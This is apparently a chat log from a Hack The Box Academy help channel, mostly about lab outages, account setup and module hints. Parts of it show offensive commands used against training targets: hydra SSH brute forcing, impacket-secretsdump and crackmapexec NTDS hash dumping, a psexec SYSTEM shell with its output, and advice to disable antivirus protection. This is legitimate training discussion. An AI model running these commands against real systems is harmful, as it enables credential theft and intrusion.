so I restarted it, now I have the tun0 interface, it popped up after connecting to the VPN, however trying the below commands but no progress. I think it's a problem with HTB
then come back to it later ¯\_(ツ)_/¯
Also don't be running around your system as root
Fuckin christ
@opal jewel sorry for the ping man. I'm in attacking common applications - thick client applications. I'm not stuck but when i try to RDP into the windows box, it's just extremely slow, i can't even run anything. was it the same for you or?
@molten prawn When I did that module a month or so ago, it ran ok for me
I have had that issue occasionally while rdp'ing into stuff on htb.
I've never had it
do you think Remmina would be faster a little or it has to do with the target machines issue ?
Remmina will be the same
good to know, thanks.
I've never had issues with rdp sessions but i know it happens to people
I mean make sure you are giving ok amount of resources to a vm or maybe try attackbox
@opal jewel bread guy
Thank you very much. i got the password
stab the bread not me.
What does this have to do with htb academy?
academy looks cool, but the price
Skill issue tbh
Nevermind
Read #welcome to figure out how to access more of the server to ask in a relevant place
wtf ?
Yes? Can I help you?
"Skill issue tbh"
Ok? And it's in reference to the price of academy, clearly not being serious
fair
Htb academy is, in general, cheaper for the overall quality of the content
hm ah
As opposed to, say, pen200/oscp
got it y ur true
Multiple people have attested that oscp was child's play compared to cpts
yea
Heck some people are using the cpts course to prep for oscp
hello, anyone facing timeout when trying to rdp to the machine ?
Try changing to tcp download. Or changing vpn region altogether
Is no one else having this issue? It's practically unusable and making each module exercise take at least 10x longer than it should 
thanks.. gonna try it
If only there was some sort of warning that boxes were having issues
The box spawning issues also relates to the stability issues
Spawning targets...?
Yes
I'm just waiting for the people to spam the blogs for the CPTS vs OSCP review
Pspsps @slender shoal
I am having the same issue. Changing servers does nothing. No targets will spawn for me.
one sec
pspsps @next bronze
I think you're missing @next bronze blog
smdh buffet I thought you were cool
just copy from this next time lmao #cpts message
although, I have a question. How was initial access tricky, yet you still got everything in 4 hours lol?
it's trickier compared to what I've heard, but still easy to me
Servers are having issues.
call me sick but my attackbox is my host lol
C'mon you gotta sell the CPTS, you need to add that with CPTS training you also can figure it out
and a new update on the machine. it does not even connect
that's pretty much what I said in the blog no?
like i connect but after a couple minutes it kicks me out
stating network disconnected
HTB is having some issues at the moment. Try to change VPN servers.
i did
on the other servers, the vpn connection works fine but the target machine won't spawn
but on this server, the target machine spawns but i get kicked out a couple minutes after connecting to the rdp
it's fine tho. i just hope it gets fixed soon
True, I meant in the message. Marketing is everything
They spawn fine for me, just basically unusable after that. Been the same for about a week now
Unusable how? Are you connecting to the vpn successfully?
Yes can connect to VPN fine, and spawn targets fine. But after connecting to them, they are very laggy (like via SSH it can take 5-10 seconds just to recognise keystrokes) or RDP will lag and disconnect often.
mine not working too
Still nervous
gentle reminder that when world of warcraft suffered a ddos for less than a week they gave everyone a month sub to make up for it
this is unacceptable business practice. customers have no sympathy for upstream providers. it's not their problem but paying money for access to resources that doesn't work, is.
I am doing "Password Attacks > Protected Files"'s exercise. It's asking to use Kira's password cracked prior to this exercise. I have memories of getting such a user some days ago, but I can't remember the password. I also can't find the exercise where you get it. Does someone have the password?
check your dm
Sorry, I meant Kira's password, not the answer to the exercise
Nobody learns anything by simply sharing answers to tasks
As explained above, I already did the exercise to get Kira's password some days ago, but I don't have it anymore and it's required to start the exercise I was at.
Some exercises rely on prior module answers
Try retracing your steps to see if you can't grab it again
I can't even find the exercise again
guys I'm stuck in the socks over RDP section, I can't load the dll file because regsvr32 recognizes it as a virus and then deletes it
You have to deactivate RealTimeProtection
Currently in the AD Enum Module. Played a bit with --loggedon-users in cme/nxc.
cme/nxc shows a bunch of users, while when I check directly on the server either with task manager or commands like "query user" or "qwinsta" etc. it only shows my currently logged in user and not all those users cme/nxc shows. On the other hand I logged in with several users on another server and it's not showing anything in cme/nxc while there are currently a bunch of users logged in to the server. So take this a bit with a grain of salt? Or am I misinterpreting something? Like users connected via SMB etc.
Hack The Box Exhibition CTF, what's the input key to access the event?
This event is private and invite only
Also, this channel is for questions regarding academy modules
Check this channel out for verification steps to see the other channels
you should do some offsec course labs and then complain
I also get what you're saying though
but tbf WoW has a higher revenue than htb
I have done all the offsec labs and pg. I have my oscp as well.
I tell everyone that htb academy is the best quality content even tho it isn't perfect. I have done every equivalent training in this space to make the comparison (pnpt certified as well)
Offsec labs and pg have reliable uptime btw. If you are hoping to make a comparison based on service availability there isn't one.
hey, slightly off topic but can anyone confirm if the instances on Season 4 POV are working fine. They won't start due to some server error.
#1080884182336675872 is a good place to discuss
i cannot access this
got it, thanks
I actually agree. I think people make the lab reliability a bit overblown. Used to be way worse and sentiment has carried over a bit I think. But the modern labs seem fine.
I had some exam lab issues with them but that was almost entirely just their proctoring software sucking ass.
There literally was an outage 2 days ago but ok
I spent two weeks on the course and it went down like 4 times
source: his experience
Source: facts
Idk wtf ur saying lol
lets be fair though. HTB has also been experiencing outages recently
they were agreeing with you
how long did this last 
Hello, I'm stuck on the ACTIVE DIRECTORY BLOODHOUND skills assessment last question (Find the percentage of users with a path to GLOBAL ADMINISTRATOR. Submit the number as your answer (to two decimal points, i.e., 11.78)). I tried all things, I have found all users, but I can't issue that. Can somebody help me?
A day or so
I'm saying he said that there's "0 comparison" and that "offsec is reliable" (i.e his experience was reliable) but that's not the case for everyone
so the source was his experience not fact
Ok
I forgot the exact way to do it but you can get the ballpark number and bruteforce the decimals, after you get the answer you can work backwards to find out how to get it
thanks, I'll try
IT WORKS THANK YOU. I have tried that for 2 days, and I already had the right answer, but HTB didn't take it
I'm doing the DCSync module rn and the command Get-DomainUser doesn't exist
yet in the module it seems to work fine
anyone else had this issue?
import powerview
hi, is it possible that the ssh brute on " Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer.
" runs about 16 hrs ?
Use ftp instead
@here please I need help using the elastic kibana to search for windows event logs. i tried the input for unsuccessful login but i have got no results
@autumn pilot please I need help using the elastic kibana to search for windows event logs. i tried the input for unsuccessful login but i have got no results
which module and section is that from
how to identify available data
ok, from which module and section is that?
it's the SOC Analyst module on Security Monitoring and SIEM fundamentals
make sure you have set up the time correctly, e.g., last ~15 years
it says no result match search criteria when i use '4625'
hello everyone
i'm new
i don't know anything about hacking but i want to learn about it
use htb academy
yes i'm in the htb academy
this channel is for discussing modules specifically
where can i write?
if you want to know where to start module wise that'd be a more appropriate question
@rapid sparrow is that your clone?
Can't spawn target or pwnbox, any updates on the ETA until it's back to normal?
Wasn't there a beginning bible?
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
I can't switch vpn neither spawn targets
nice to meet you, my name is Ezra too, are you israeli as well?
this isn't a gen-chat
Here you go #general
i dont have access there
oh, thanks, and sorry
No problem
I'm trying but getting this:
Account Identifier does not appear to be the right length (must be 60 characters long).
I'm in the settings of htb but the only number i see is my "student id"
am i missing something?
You should get an email I think.
You have to take the identifier from the main page (app), not from the Academy
thanks
also
Now that I've verified my email i can use pwnbox?
Also should i look into what type of hacker I'm looking to be before i become proficient?
I'm looking at grey hatted or white rn
im not professional, but i think you have to learn a lot before you even get the skills required to decide
The PwnBox is available on the Academy but also on the main page.
can i pm you? related to not finding the identifier
I'd rather just learn to fix websites' flaws and be a penetration tester
I'm 14 though, so I'm not engaging a lot until I'm above 18
but it's good to get an early start.
i learned networking and now I'm learning linux, afterwards i want to learn python and then subnetting, and then I'll decide more, there is a lot to learn
python is gonna be my first coding language I'll learn
Pwnbox has a loading instance for me
it's taking pretty long
i get 2 hours per day right?
I'm in that link, i don't see it there, only student id
because you're likely signing into academy
I'm just a script kiddie rn
check your url bar; does it say app.hackthebox.com or academy.hackthebox.com
I'm only on the starting point's first task
on the app page; the 2 hours is lifetime
the per day is only for academy
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
set up your own vm and use the vpn
is Jack a real person?
also for any future bits please link your account to the discord so you can access #starting-point ; this channel is for academy modules not starting-point tasks
it's not at least for tier 0 stuff
again: link your htb account following the instructions in #welcome and you can ask in #starting-point
k got it
look at the url; do you see academy.hackthebox.com or app.hackthebox.com
if you see academy.hackthebox.com you're in the wrong place for the identifier
the identifier is ONLY on https://app.hackthebox.com
it's not in academy (yet)
^
know what?
Hello guys, I just recently got into HTB Academy and I'm stuck at the File Descriptors and Redirectors Module: Linux Fundamentals. after connecting to the machine, I'm met with no directories, no files, I have absolutely no idea what to do
my problem is that I'm logged in to the academy but for the app i need to enter a password which i forgot, and password recovery isn't working now, or delaying
it's things they've talked about
it is going to academy
oh
they've literally talked about things
Then reach out to the support
ls -la
speaking of file descriptors do u know it's cheaper on the computer to redirect to &- (a closed file descriptor) instead of /dev/null
it's also less keystrokes
are the app and the academy 2 different accounts or is it the same
i mean most people nab their revshells from https://www.revshells.com/
different accounts
ahhh that's why it doesn't recover my password. I'll go ahead and register. thank you for the help like always
what do I do now
whatever you're required to do by the task
figure out what the question wants and go from there ¯\_(ツ)_/¯
Got it, thanks a lot, man
Good evening
no, I am the real hecker
Subscribe and I'll buy you 2m dollars.
(if you have any issues related to videos contact me we will be happy to serve you maybehecker@gmail.com)
hecker hecker hecker
Anybody have any idea why HTBA has been having so many connection issues lately?
Has this been the norm for a while? I've only recently joined the academy specifically but I never had trouble connecting to the boxes on HTB ever really. And I've used the platform for many years.
upstream issues with their providers
this issue extended to the labs site as well
So has this issue only come up recently? Past few months or so? I genuinely don't remember ever having connection issues when I happened to be using HTB previously.
I will say though since the site has gotten a ton of updates I haven't used it as much due to life circumstances.
I think it's really cool academy exists now. The cert is relatively cheap so that's why I'm going for it. It seems like the first time I can actually afford to snag a cert. Most of what I've been learning isn't new to me, but I have picked up a bit of interesting insight here and there and became more attuned to using some neat tricks. I only started HTBA a few weeks ago and I've experienced connection issues most days haha.
ye relatively recent
Alright cool. Good to know this isn't the norm at least. I'm sure they're working hard to get it working again. It's not entirely broken just been a little shoddy. And like you said the issue is with their providers, so there's not much they can really do.
I'm not mad. Overall I think the academy is a great resource. I've tried to refer some friends irl but man for some reason everyone thinks computer shit is hieroglyphics.
And I'm like the whole point is to learn and it's still too much
Even for me there's so many modules I expect to learn some good shit, despite learning about this subject for a decade. You can always learn more and it's fun
carefully
if you used get to download the file, just exit smb and it should be right there in that directory
try and see
AD module (kerberoasting from linux)
what powerful local group on the domain controller is the sapservice user a member of
Tried every group listed based on response and none works
Anyone plz help
on this module (Session Security > Cross-Site Request Forgery (CSRF or XSRF) in "Cross-Site Request Forgery"), does this just work assuming that we are still using "Ela Stienen"'s cookie? not completely sure how the details would end up at the server otherwise https://academy.hackthebox.com/module/153/section/1447
UNDERSTANDING LOG SOURCES & INVESTIGATING WITH SPLUNK -
Intrusion Detection With Splunk : Q4 -
Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through SPL searches against all data the two IP addresses of the C2 callback server. Answer format: 10.0.0.1XX and 10.0.0.XX
how did anyone correlate the 2 IPs together?
i was able to find the first one 10.0.0.1XX
but the 2nd one was just tough to find
since its for the same machine too
Not you but the victim. If no additional protections are supplied the browser will send the cookie automatically when the victim accesses the malicious link. In the example a POST method is used but the question asks for GET, which keeps the behavior if no additional protections are supplied, so the browser sends the cookie of the victim if he has a session in the vulnerable application.
so the malicious site will just grab the cookie and it has access to it because the user is logged in in another tab right?
Any one completed "ADVANCED XSS AND CSRF EXPLOITATION"
section "XSS Filter Bypasses"?
Well, the malicious site never touches the cookie. The csrf vulnerability exploits the browser's default behaviour. Like, if a user accesses an application the browser will check if the user has a session for that application and sends the cookie together, so this way the user experience is improved as the user doesn't need to authenticate again if he is already authenticated. If the user hasn't logged out the session still exists even if the tab is closed.
So, that's why this is called Cross site request forgery, a request made from one website to another that leverages the user already being authenticated
i see, thank you
You can dm
Hi All, in the nmap Firewall and IDS/IPS evasion section it is mentioned that nmap -sA is hard to detect for firewalls, which in my knowledge and experience is wrong. A firewall keeps a connection table for each connection and its state. If it receives an ACK flag packet it will drop it as it does not have any connection state for it. Please correct me if i am wrong. This was true in the case of stateless firewalls that are no longer used
that module has received some criticism in regards to being not up to date. There are also parts about decoy scans and how they can be used to evade firewalls which isn't true anymore. I guess just try to not take this module too serious
Yes, actually the -sA option is used to help map the firewall ruleset, not to determine if the ports are open/closed. That is stated in the nmap documentation:
https://nmap.org/book/scan-methods-ack-scan.html
Tom, I logged in via ssh and couldn't find anything. Tom cannot log in to mysql. There is a second user. Where can I find it? Footprinting Lab - Hard
Try to find the Sysmon EventCode that is related to network connections. Also search through the fields and try to identify which one could be related to the IP from a callback server
i tried to search for DNS queries that could relate to the same resolved IP and link them together
and look for vast network connections with ID=3
now for the first longer IP it was easy to identify since it was making some malicious wget calls like for SharpHound installation
but when i tried to relate it to its other IP i couldn't find any sudden change in IP or so within the events.
Try identifying which machine contacted it and filter what other IPs it connected to. Anyways, pm me if you want
sure .. thx
Remember the most common commands to run when you first gain access to someone's account, this should help
Can anyone help me with the question "Inspect the ICMP_smurf.pcapng file, part of this module's resources, and enter the total number of attacking hosts as your answer" from the IP Source & Destination Spoofing Attacks section of the Intermediate Network Traffic Analysis module? I've tried a few different filters but I can't seem to get the right answer and I'm struggling to think of another filter that would work
Hey, My account has been under the verification process for a few weeks now, i have contacted support using email but no response, i have tried their chatbot and created a ticket but no response, could anyone help me regarding this matter?
@marble pond
@low fox
Do I need to increase permissions?
nope
I entered mysql and there is nothing.
DM me with your steps
check
Hi, I've got stuck at Digital Forensics, part: Skills Assessment:
Using VAD analysis, pinpoint the suspicious process and enter its name as your answer. Answer format: _.exe
I've created a VAD-related collection with adjusted suspicious content, but the only processes I can see are svchost.exe processes.
Could someone help me with it?
Somebody please fix the spawning issues.
This spawning issue, I've been facing it since November, and it's honestly annoying when my flow breaks.
I see #announcements saying it's fixed, but it's not, well not for me anyway.
I can help in testing if needed, but i desperately want it fixed.
NONE of the VPN servers configs succeed in spawning the boxes.
Anyone else having issues with the -just-dc flag in impacket-secretsdump? All it does is go to clean up.
Using the debug option I get told that the domain doesn't exist, though in the module and without the -just-dc option it works fine.
impacket-secretsdump -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@10.129.201.234 -debug
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[+] Exiting NTDSHashes.dump() because SAMR SessionError: code: 0xc00000df - STATUS_NO_SUCH_DOMAIN - The specified domain did not exist.
[*] Cleaning up...
.local
still same issue persists
impacket-secretsdump -outputfile inlanefreight_hashes -just-dc inlanefreight.local/adunn@10.129.201.234 -debug
10.129.201.234 ? that's not the right ip
nope it's the correct ip
Do I need to add the host INLANEFREIGHT.LOCAL to the /etc/hosts file?
The specified domain did not exist.
with this command
If I remove the -just-dc option, however, it works fine.
I'm sure that's not the only thing it shows, but try to authenticate with netexec.
Question: When doing skill assessments, is there "only one way" to break into the box or multiple? Or depends? Specifically talking about CBBH path
It depends, usually it's straightforward a -> b -> c
It'll generally relate to the content you just read
cool thanks @fathom pendant
netexec or psexec?
don't have netexec
crackmapexec then
psexec works fine
┌──(points㉿kali)-[~/Desktop/HackTheBox/academy]
└─$ impacket-psexec inlanefreight.local/adunn@10.129.201.234
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Requesting shares on 10.129.201.234.....
[*] Found writable share ADMIN$
[*] Uploading file nEALVIEh.exe
[*] Opening SVCManager on 10.129.201.234.....
[*] Creating service iMjr on 10.129.201.234.....
[*] Starting service iMjr.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
I'm talking about crackmapexec/netexec
alright, I'll check cme then
└─$ crackmapexec smb 10.129.201.234 -u 'adunn' -p 'REDACTED'
SMB 10.129.201.234 445 ACADEMY-EA-MS01 [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-MS01) (domain:INLANEFREIGHT.LOCAL) (signing:False) (SMBv1:False)
SMB 10.129.201.234 445 ACADEMY-EA-MS01 [+] INLANEFREIGHT.LOCAL\adunn:REDACTED (Pwn3d!)
ok then add --ntds at the back
SMB 10.129.201.234 445 ACADEMY-EA-MS01 [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-MS01) (domain:INLANEFREIGHT.LOCAL) (signing:False) (SMBv1:False)
SMB 10.129.201.234 445 ACADEMY-EA-MS01 [+] INLANEFREIGHT.LOCAL\adunn:REDACTED (Pwn3d!)
SMB 10.129.201.234 445 ACADEMY-EA-MS01 [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.129.201.234 445 ACADEMY-EA-MS01 [+] Dumped 0 NTDS hashes to /home/points/.cme/logs/ACADEMY-EA-MS01_10.129.201.234_2024-02-01_071319.ntds of which 0 were added to the database
hm, reset the target
Yeah, I mean I just recently started it as well. Was stuck on this last night as well.
what module and section
i can dump lsa and sam hashes just fine as well
DCSync
i have gotten 2 out of 3 questions
only this part left
Hello! I'm stuck on the Login Brute Forcing module. It seems that the target is not allowing password login, so I cannot brute force the password. In my opinion this is something that has to be configured from the target side, which cannot be done. Right now I'm getting an error "Permission denied (publickey).", last time I tried it I got something along the lines of "Target has not allowed password logins". Could anyone give me a hint on what to do?
Well that means it needs an rsa key
Yes but the public key has to be added to the target I understand?
No
It means you'd need to find it and add it to your command to log in
So ssh isn't the way to start this
hmm okay
In the learning material they are using hydra to brute force the password, but I guess there is an additional step there then?
Scan the target
They're likely using hydra against a different service, or a web login
They are doing this in the tutorial: hydra -L bill.txt -P william.txt -u -f ssh://178.35.49.134:22 -t 4
and just getting the username and password by brute forcing.
"Tutorial" you mean the module's sections
yes, sorry
You should be able to adapt your command to your usecase
If given a public ip:port, start there
i will try, thanks
Step -1: assess your target
that is weird, use mimikatz
Is there an issue with servers since yesterday? I have been trying to do the Password Attacks Lab - Easy since yesterday but I am never getting any open port on the target. I tried restarting the machine.
Uhm, never mind. It seems the SYN scan was messing things up.
We are currently facing some issues with targets spawning
Attempt changing VPN servers and respawning the targets as the current behavior is intermittent.
Does this mean I actually have to work, at work.. instead of doing labs? :'(
I mean it gives instructions on basic troubleshooting to fix ¯\_(ツ)_/¯
You mean as part of the getting-started module?
Because that module gives you a pretty decent walk-through
Just some critical thinking required to change a few things
Yeah, I actually got like 95% of the way done
I hope this gets compensated with a free 2-week streak freeze.
My biggest issue is actually when I go to amend the monitor.sh file, it doesn't amend properly with the command that you're advised to give. Of course I change the IP address in the command so it's directed to me, but even then it says that monitor.sh doesn't exist.
Did you unzip the personal.zip?
Did you cd to the directory that has it?
Yes!
But not mine
I'm gonna re-try it again rn and I'll let you know how I get on ^^
You're doing the command via the nc connection yeah? Not your machine?